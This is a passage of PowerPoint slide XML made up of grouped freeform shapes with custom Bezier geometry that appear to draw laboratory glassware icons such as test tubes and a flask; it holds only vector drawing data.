                      <a:pt x="39" y="144"/>
                      <a:pt x="39" y="144"/>
                      <a:pt x="39" y="144"/>
                    </a:cubicBez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8"/>
                      <a:pt x="43" y="138"/>
                      <a:pt x="43" y="138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7" y="18"/>
                      <a:pt x="37" y="18"/>
                      <a:pt x="37" y="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01" name="Freeform 2978"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3437" y="3531"/>
                <a:ext cx="270" cy="617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 79 w 114"/>
                  <a:gd name="T1" fmla="*/ 129 h 261"/>
                  <a:gd name="T2" fmla="*/ 79 w 114"/>
                  <a:gd name="T3" fmla="*/ 38 h 261"/>
                  <a:gd name="T4" fmla="*/ 89 w 114"/>
                  <a:gd name="T5" fmla="*/ 29 h 261"/>
                  <a:gd name="T6" fmla="*/ 79 w 114"/>
                  <a:gd name="T7" fmla="*/ 15 h 261"/>
                  <a:gd name="T8" fmla="*/ 36 w 114"/>
                  <a:gd name="T9" fmla="*/ 2 h 261"/>
                  <a:gd name="T10" fmla="*/ 24 w 114"/>
                  <a:gd name="T11" fmla="*/ 10 h 261"/>
                  <a:gd name="T12" fmla="*/ 36 w 114"/>
                  <a:gd name="T13" fmla="*/ 25 h 261"/>
                  <a:gd name="T14" fmla="*/ 36 w 114"/>
                  <a:gd name="T15" fmla="*/ 116 h 261"/>
                  <a:gd name="T16" fmla="*/ 0 w 114"/>
                  <a:gd name="T17" fmla="*/ 166 h 261"/>
                  <a:gd name="T18" fmla="*/ 56 w 114"/>
                  <a:gd name="T19" fmla="*/ 251 h 261"/>
                  <a:gd name="T20" fmla="*/ 114 w 114"/>
                  <a:gd name="T21" fmla="*/ 201 h 261"/>
                  <a:gd name="T22" fmla="*/ 79 w 114"/>
                  <a:gd name="T23" fmla="*/ 129 h 261"/>
                  <a:gd name="T24" fmla="*/ 37 w 114"/>
                  <a:gd name="T25" fmla="*/ 121 h 261"/>
                  <a:gd name="T26" fmla="*/ 39 w 114"/>
                  <a:gd name="T27" fmla="*/ 121 h 261"/>
                  <a:gd name="T28" fmla="*/ 39 w 114"/>
                  <a:gd name="T29" fmla="*/ 19 h 261"/>
                  <a:gd name="T30" fmla="*/ 36 w 114"/>
                  <a:gd name="T31" fmla="*/ 18 h 261"/>
                  <a:gd name="T32" fmla="*/ 30 w 114"/>
                  <a:gd name="T33" fmla="*/ 12 h 261"/>
                  <a:gd name="T34" fmla="*/ 36 w 114"/>
                  <a:gd name="T35" fmla="*/ 7 h 261"/>
                  <a:gd name="T36" fmla="*/ 79 w 114"/>
                  <a:gd name="T37" fmla="*/ 19 h 261"/>
                  <a:gd name="T38" fmla="*/ 83 w 114"/>
                  <a:gd name="T39" fmla="*/ 27 h 261"/>
                  <a:gd name="T40" fmla="*/ 79 w 114"/>
                  <a:gd name="T41" fmla="*/ 31 h 261"/>
                  <a:gd name="T42" fmla="*/ 76 w 114"/>
                  <a:gd name="T43" fmla="*/ 30 h 261"/>
                  <a:gd name="T44" fmla="*/ 74 w 114"/>
                  <a:gd name="T45" fmla="*/ 29 h 261"/>
                  <a:gd name="T46" fmla="*/ 74 w 114"/>
                  <a:gd name="T47" fmla="*/ 131 h 261"/>
                  <a:gd name="T48" fmla="*/ 76 w 114"/>
                  <a:gd name="T49" fmla="*/ 132 h 261"/>
                  <a:gd name="T50" fmla="*/ 106 w 114"/>
                  <a:gd name="T51" fmla="*/ 180 h 261"/>
                  <a:gd name="T52" fmla="*/ 9 w 114"/>
                  <a:gd name="T53" fmla="*/ 151 h 261"/>
                  <a:gd name="T54" fmla="*/ 37 w 114"/>
                  <a:gd name="T55" fmla="*/ 12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4" h="261">
                    <a:moveTo>
                      <a:pt x="79" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="38"/>
                      <a:pt x="79" y="38"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="39"/>
                      <a:pt x="89" y="34"/>
                      <a:pt x="89" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="22"/>
                      <a:pt x="83" y="16"/>
                      <a:pt x="79" y="15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0" y="0"/>
                      <a:pt x="24" y="3"/>
                      <a:pt x="24" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="14"/>
                      <a:pt x="30" y="23"/>
                      <a:pt x="36" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="116"/>
                      <a:pt x="36" y="116"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="118"/>
                      <a:pt x="0" y="139"/>
                      <a:pt x="0" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="204"/>
                      <a:pt x="26" y="242"/>
                      <a:pt x="56" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="261"/>
                      <a:pt x="114" y="240"/>
                      <a:pt x="114" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="99" y="146"/>
                      <a:pt x="79" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="121"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="121"/>
                      <a:pt x="39" y="121"/>
                      <a:pt x="39" y="121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17"/>
                      <a:pt x="30" y="14"/>
                      <a:pt x="30" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="7"/>
                      <a:pt x="32" y="5"/>
                      <a:pt x="36" y="7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81" y="20"/>
                      <a:pt x="83" y="23"/>
                      <a:pt x="83" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="30"/>
                      <a:pt x="81" y="31"/>
                      <a:pt x="79" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="30"/>
                      <a:pt x="76" y="30"/>
                      <a:pt x="76" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="29"/>
                      <a:pt x="74" y="29"/>
                      <a:pt x="74" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="131"/>
                      <a:pt x="74" y="131"/>
                      <a:pt x="74" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="132"/>
                      <a:pt x="76" y="132"/>
                      <a:pt x="76" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="143"/>
                      <a:pt x="101" y="160"/>
                      <a:pt x="106" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="151"/>
                      <a:pt x="9" y="151"/>
                      <a:pt x="9" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="134"/>
                      <a:pt x="24" y="123"/>
                      <a:pt x="37" y="1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002" name="Group 2982"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5565475" y="3273819"/>
              <a:ext cx="327025" cy="309563"/>
              <a:chOff x="1593" y="3869"/>
              <a:chExt cx="1344" cy="1285"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1003" name="Freeform 2983"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1593" y="3869"/>
                <a:ext cx="1344" cy="1285"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 359 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 924 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 359 h 1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1285">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="359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004" name="Group 2984"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1968" y="4129"/>
                <a:ext cx="123" cy="690"/>
                <a:chOff x="1968" y="4129"/>
                <a:chExt cx="123" cy="690"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1019" name="Freeform 2985"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1978" y="4573"/>
                  <a:ext cx="0" cy="2"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 h 1"/>
                    <a:gd name="T1" fmla="*/ 1 h 1"/>
                    <a:gd name="T2" fmla="*/ 0 h 1"/>
                    <a:gd name="T3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0" name="Freeform 2986"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2082" y="4570"/>
                  <a:ext cx="2" cy="8"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1"/>
                    <a:gd name="T1" fmla="*/ 3 h 3"/>
                    <a:gd name="T2" fmla="*/ 1 w 1"/>
                    <a:gd name="T3" fmla="*/ 2 h 3"/>
                    <a:gd name="T4" fmla="*/ 0 w 1"/>
                    <a:gd name="T5" fmla="*/ 0 h 3"/>
                    <a:gd name="T6" fmla="*/ 0 w 1"/>
                    <a:gd name="T7" fmla="*/ 3 h 3"/>
                    <a:gd name="T8" fmla="*/ 0 w 1"/>
                    <a:gd name="T9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cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="1" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0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1" name="Freeform 2987"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1978" y="4575"/>
                  <a:ext cx="104" cy="244"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 44"/>
                    <a:gd name="T1" fmla="*/ 1 h 103"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 0 h 103"/>
                    <a:gd name="T4" fmla="*/ 0 w 44"/>
                    <a:gd name="T5" fmla="*/ 81 h 103"/>
                    <a:gd name="T6" fmla="*/ 22 w 44"/>
                    <a:gd name="T7" fmla="*/ 103 h 103"/>
                    <a:gd name="T8" fmla="*/ 44 w 44"/>
                    <a:gd name="T9" fmla="*/ 81 h 103"/>
                    <a:gd name="T10" fmla="*/ 44 w 44"/>
                    <a:gd name="T11" fmla="*/ 1 h 103"/>
                    <a:gd name="T12" fmla="*/ 22 w 44"/>
                    <a:gd name="T13" fmla="*/ 6 h 103"/>
                    <a:gd name="T14" fmla="*/ 0 w 44"/>
                    <a:gd name="T15" fmla="*/ 1 h 1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4" h="103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5"/>
                        <a:pt x="0" y="81"/>
                        <a:pt x="0" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="84"/>
                        <a:pt x="1" y="103"/>
                        <a:pt x="22" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="103"/>
                        <a:pt x="44" y="84"/>
                        <a:pt x="44" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="81"/>
                        <a:pt x="44" y="45"/>
                        <a:pt x="44" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="4"/>
                        <a:pt x="33" y="6"/>
                        <a:pt x="22" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="2" y="4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2" name="Freeform 2988"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1971" y="4148"/>
                  <a:ext cx="120" cy="425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 51 w 51"/>
                    <a:gd name="T1" fmla="*/ 0 h 180"/>
                    <a:gd name="T2" fmla="*/ 25 w 51"/>
                    <a:gd name="T3" fmla="*/ 6 h 180"/>
                    <a:gd name="T4" fmla="*/ 0 w 51"/>
                    <a:gd name="T5" fmla="*/ 0 h 180"/>
                    <a:gd name="T6" fmla="*/ 3 w 51"/>
                    <a:gd name="T7" fmla="*/ 12 h 180"/>
                    <a:gd name="T8" fmla="*/ 3 w 51"/>
                    <a:gd name="T9" fmla="*/ 180 h 180"/>
                    <a:gd name="T10" fmla="*/ 25 w 51"/>
                    <a:gd name="T11" fmla="*/ 175 h 180"/>
                    <a:gd name="T12" fmla="*/ 47 w 51"/>
                    <a:gd name="T13" fmla="*/ 179 h 180"/>
                    <a:gd name="T14" fmla="*/ 47 w 51"/>
                    <a:gd name="T15" fmla="*/ 14 h 180"/>
                    <a:gd name="T16" fmla="*/ 51 w 51"/>
                    <a:gd name="T17" fmla="*/ 0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1" h="180">
                      <a:moveTo>
                        <a:pt x="51" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="3"/>
                        <a:pt x="38" y="6"/>
                        <a:pt x="25" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="6"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="3" y="7"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="16"/>
                        <a:pt x="3" y="109"/>
                        <a:pt x="3" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="177"/>
                        <a:pt x="14" y="175"/>
                        <a:pt x="25" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="175"/>
                        <a:pt x="45" y="177"/>
                        <a:pt x="47" y="179"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="109"/>
                        <a:pt x="47" y="18"/>
                        <a:pt x="47" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="8"/>
                        <a:pt x="50" y="3"/>
                        <a:pt x="5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3" name="Freeform 2989"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1968" y="4129"/>
                  <a:ext cx="123" cy="33"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 52"/>
                    <a:gd name="T1" fmla="*/ 8 h 14"/>
                    <a:gd name="T2" fmla="*/ 52 w 52"/>
                    <a:gd name="T3" fmla="*/ 7 h 14"/>
                    <a:gd name="T4" fmla="*/ 26 w 52"/>
                    <a:gd name="T5" fmla="*/ 0 h 14"/>
                    <a:gd name="T6" fmla="*/ 0 w 52"/>
                    <a:gd name="T7" fmla="*/ 7 h 14"/>
                    <a:gd name="T8" fmla="*/ 1 w 52"/>
                    <a:gd name="T9" fmla="*/ 8 h 14"/>
                    <a:gd name="T10" fmla="*/ 26 w 52"/>
                    <a:gd name="T11" fmla="*/ 14 h 14"/>
                    <a:gd name="T12" fmla="*/ 52 w 52"/>
                    <a:gd name="T13" fmla="*/ 8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4">
                      <a:moveTo>
                        <a:pt x="52" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="7"/>
                        <a:pt x="52" y="7"/>
                        <a:pt x="52" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="3"/>
                        <a:pt x="40" y="0"/>
                        <a:pt x="26" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="0"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="1" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="26" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="14"/>
                        <a:pt x="49" y="11"/>
                        <a:pt x="52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Freeform 2990"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1978" y="4561"/>
                  <a:ext cx="104" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 22 w 44"/>
                    <a:gd name="T1" fmla="*/ 0 h 12"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 5 h 12"/>
                    <a:gd name="T4" fmla="*/ 0 w 44"/>
                    <a:gd name="T5" fmla="*/ 6 h 12"/>
                    <a:gd name="T6" fmla="*/ 0 w 44"/>
                    <a:gd name="T7" fmla="*/ 7 h 12"/>
                    <a:gd name="T8" fmla="*/ 22 w 44"/>
                    <a:gd name="T9" fmla="*/ 12 h 12"/>
                    <a:gd name="T10" fmla="*/ 44 w 44"/>
                    <a:gd name="T11" fmla="*/ 7 h 12"/>
                    <a:gd name="T12" fmla="*/ 44 w 44"/>
                    <a:gd name="T13" fmla="*/ 4 h 12"/>
                    <a:gd name="T14" fmla="*/ 22 w 44"/>
                    <a:gd name="T15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4" h="12">
                      <a:moveTo>
                        <a:pt x="22" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="0" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5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7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="11" y="12"/>
                        <a:pt x="22" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="12"/>
                        <a:pt x="42" y="10"/>
                        <a:pt x="44" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="6"/>
                        <a:pt x="44" y="5"/>
                        <a:pt x="44" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="2"/>
                        <a:pt x="33" y="0"/>
                        <a:pt x="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05" name="Group 2991"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2195" y="4190"/>
                <a:ext cx="123" cy="688"/>
                <a:chOff x="2195" y="4190"/>
                <a:chExt cx="123" cy="688"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1013" name="Freeform 2992"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2205" y="4441"/>
                  <a:ext cx="0" cy="4"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 h 2"/>
                    <a:gd name="T1" fmla="*/ 2 h 2"/>
                    <a:gd name="T2" fmla="*/ 2 h 2"/>
                    <a:gd name="T3" fmla="*/ 0 h 2"/>
                    <a:gd name="T4" fmla="*/ 1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2">
                      <a:moveTo>
                        <a:pt x="0" y="1"/>
                      </a:move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Freeform 2993"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2309" y="4441"/>
                  <a:ext cx="2" cy="4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2 h 2"/>
                    <a:gd name="T4" fmla="*/ 1 w 1"/>
                    <a:gd name="T5" fmla="*/ 1 h 2"/>
                    <a:gd name="T6" fmla="*/ 0 w 1"/>
                    <a:gd name="T7" fmla="*/ 0 h 2"/>
                    <a:gd name="T8" fmla="*/ 0 w 1"/>
                    <a:gd name="T9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0" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0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5" name="Freeform 2994"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2195" y="4190"/>
                  <a:ext cx="123" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 52"/>
                    <a:gd name="T1" fmla="*/ 8 h 13"/>
                    <a:gd name="T2" fmla="*/ 52 w 52"/>
                    <a:gd name="T3" fmla="*/ 6 h 13"/>
                    <a:gd name="T4" fmla="*/ 26 w 52"/>
                    <a:gd name="T5" fmla="*/ 0 h 13"/>
                    <a:gd name="T6" fmla="*/ 0 w 52"/>
                    <a:gd name="T7" fmla="*/ 6 h 13"/>
                    <a:gd name="T8" fmla="*/ 1 w 52"/>
                    <a:gd name="T9" fmla="*/ 8 h 13"/>
                    <a:gd name="T10" fmla="*/ 26 w 52"/>
                    <a:gd name="T11" fmla="*/ 13 h 13"/>
                    <a:gd name="T12" fmla="*/ 52 w 52"/>
                    <a:gd name="T13" fmla="*/ 8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3">
                      <a:moveTo>
                        <a:pt x="52" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="7"/>
                        <a:pt x="52" y="6"/>
                        <a:pt x="52" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="3"/>
                        <a:pt x="40" y="0"/>
                        <a:pt x="26" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="0"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="1" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="13" y="13"/>
                        <a:pt x="26" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="13"/>
                        <a:pt x="49" y="11"/>
                        <a:pt x="52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6" name="Freeform 2995"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2198" y="4209"/>
                  <a:ext cx="120" cy="232"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 25 w 51"/>
                    <a:gd name="T1" fmla="*/ 93 h 98"/>
                    <a:gd name="T2" fmla="*/ 47 w 51"/>
                    <a:gd name="T3" fmla="*/ 98 h 98"/>
                    <a:gd name="T4" fmla="*/ 47 w 51"/>
                    <a:gd name="T5" fmla="*/ 13 h 98"/>
                    <a:gd name="T6" fmla="*/ 51 w 51"/>
                    <a:gd name="T7" fmla="*/ 0 h 98"/>
                    <a:gd name="T8" fmla="*/ 25 w 51"/>
                    <a:gd name="T9" fmla="*/ 5 h 98"/>
                    <a:gd name="T10" fmla="*/ 0 w 51"/>
                    <a:gd name="T11" fmla="*/ 0 h 98"/>
                    <a:gd name="T12" fmla="*/ 3 w 51"/>
                    <a:gd name="T13" fmla="*/ 12 h 98"/>
                    <a:gd name="T14" fmla="*/ 3 w 51"/>
                    <a:gd name="T15" fmla="*/ 98 h 98"/>
                    <a:gd name="T16" fmla="*/ 25 w 51"/>
                    <a:gd name="T17" fmla="*/ 93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1" h="98">
                      <a:moveTo>
                        <a:pt x="25" y="93"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="93"/>
                        <a:pt x="45" y="95"/>
                        <a:pt x="47" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="52"/>
                        <a:pt x="47" y="14"/>
                        <a:pt x="47" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="8"/>
                        <a:pt x="50" y="3"/>
                        <a:pt x="51" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="3"/>
                        <a:pt x="38" y="5"/>
                        <a:pt x="25" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="5"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="3" y="7"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="13"/>
                        <a:pt x="3" y="51"/>
                        <a:pt x="3" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="95"/>
                        <a:pt x="14" y="93"/>
                        <a:pt x="25" y="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7" name="Freeform 2996"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2205" y="4445"/>
                  <a:ext cx="104" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 44"/>
                    <a:gd name="T1" fmla="*/ 0 h 183"/>
                    <a:gd name="T2" fmla="*/ 0 w 44"/>
                    <a:gd name="T3" fmla="*/ 162 h 183"/>
                    <a:gd name="T4" fmla="*/ 22 w 44"/>
                    <a:gd name="T5" fmla="*/ 183 h 183"/>
                    <a:gd name="T6" fmla="*/ 44 w 44"/>
                    <a:gd name="T7" fmla="*/ 162 h 183"/>
                    <a:gd name="T8" fmla="*/ 44 w 44"/>
                    <a:gd name="T9" fmla="*/ 0 h 183"/>
                    <a:gd name="T10" fmla="*/ 22 w 44"/>
                    <a:gd name="T11" fmla="*/ 5 h 183"/>
                    <a:gd name="T12" fmla="*/ 0 w 44"/>
                    <a:gd name="T13" fmla="*/ 0 h 1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183">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="72"/>
                        <a:pt x="0" y="162"/>
                        <a:pt x="0" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="165"/>
                        <a:pt x="1" y="183"/>
                        <a:pt x="22" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="183"/>
                        <a:pt x="44" y="165"/>
                        <a:pt x="44" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="162"/>
                        <a:pt x="44" y="72"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="3"/>
                        <a:pt x="33" y="5"/>
                        <a:pt x="22" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="5"/>
